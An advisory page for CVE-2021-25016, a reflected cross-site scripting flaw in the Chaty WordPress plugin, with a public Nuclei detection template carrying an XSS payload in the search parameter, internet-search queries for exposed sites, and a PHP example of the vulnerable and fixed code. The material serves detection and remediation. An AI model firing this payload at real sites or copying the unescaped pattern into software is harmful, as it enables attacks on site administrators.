CVE-2021-25016: Chaty < 2.8.2 - Cross-Site Scripting

Date: 2025-08-01 | Affected software: Chaty | PoC: public

Vulnerability description

The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
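To show the bug class the advisory describes, here is an added illustration in PHP (not the Chaty plugin's own code): a hypothetical admin search box that reflects the `search` parameter unescaped, beside the same box escaped with WordPress's `esc_attr()`. The render function names and the fallback `esc_attr()` shim are assumptions so the snippet runs outside WordPress.

```php
<?php
// Added illustration of the reflected XSS pattern behind CVE-2021-25016.
// Not the Chaty plugin's code; function names are hypothetical.

// Vulnerable pattern: the raw query parameter is interpolated into HTML.
// A value such as </script><img src onerror=alert(document.domain)> closes the
// attribute and injects markup that the logged-in admin's browser executes.
function render_search_box_vulnerable(array $get): string {
    $search = $get['search'] ?? '';
    return '<input type="text" name="search" value="' . $search . '">';
}

// Hardened pattern: escape on output. esc_attr() is WordPress's attribute
// escaper; the shim below is a simplified stand-in for running this outside WP.
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

function render_search_box_fixed(array $get): string {
    $search = $get['search'] ?? '';
    return '<input type="text" name="search" value="' . esc_attr($search) . '">';
}

// Constructed request mirroring the search parameter from the PoC above.
$get = ['search' => '</script><img src onerror=alert(document.domain)>'];

echo "Vulnerable: ", render_search_box_vulnerable($get), "\n";
// Fixed output keeps the payload inert: &lt;/script&gt;&lt;img src onerror=... &gt;
echo "Fixed:      ", render_search_box_fixed($get), "\n";
```

The fix in 2.8.3 closes the same gap: any user-controlled value written into admin HTML must be escaped for the context it lands in (`esc_attr()` for attributes, `esc_html()` for text nodes).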

PoC code [public]

id: CVE-2021-25016

info:
  name: Chaty < 2.8.2 - Cross-Site Scripting
  author: luisfelipe146
  severity: medium
  description: |
    The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
  remediation: Fixed in 2.8.3
  reference:
    - https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25016
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25016
    cwe-id: CWE-79
    epss-score: 0.10375
    epss-percentile: 0.92929
    cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: premio
    product: chaty
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/chaty/
    fofa-query: body=/wp-content/plugins/chaty/
    publicwww-query: "/wp-content/plugins/chaty/"
  tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "search=</script><img src onerror=alert(document.domain)>"
          - "chaty_page_chaty"
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e55a4b5e398833ac34880a744e4ce8f551cbd79ef8bbe32ce922047fb5cd594502205a28f097b66830f8854ef8e9c9b25968f04d4de34c8d1247a7aeca813b14efc5:922c64590222798bb761d5b6d8e72950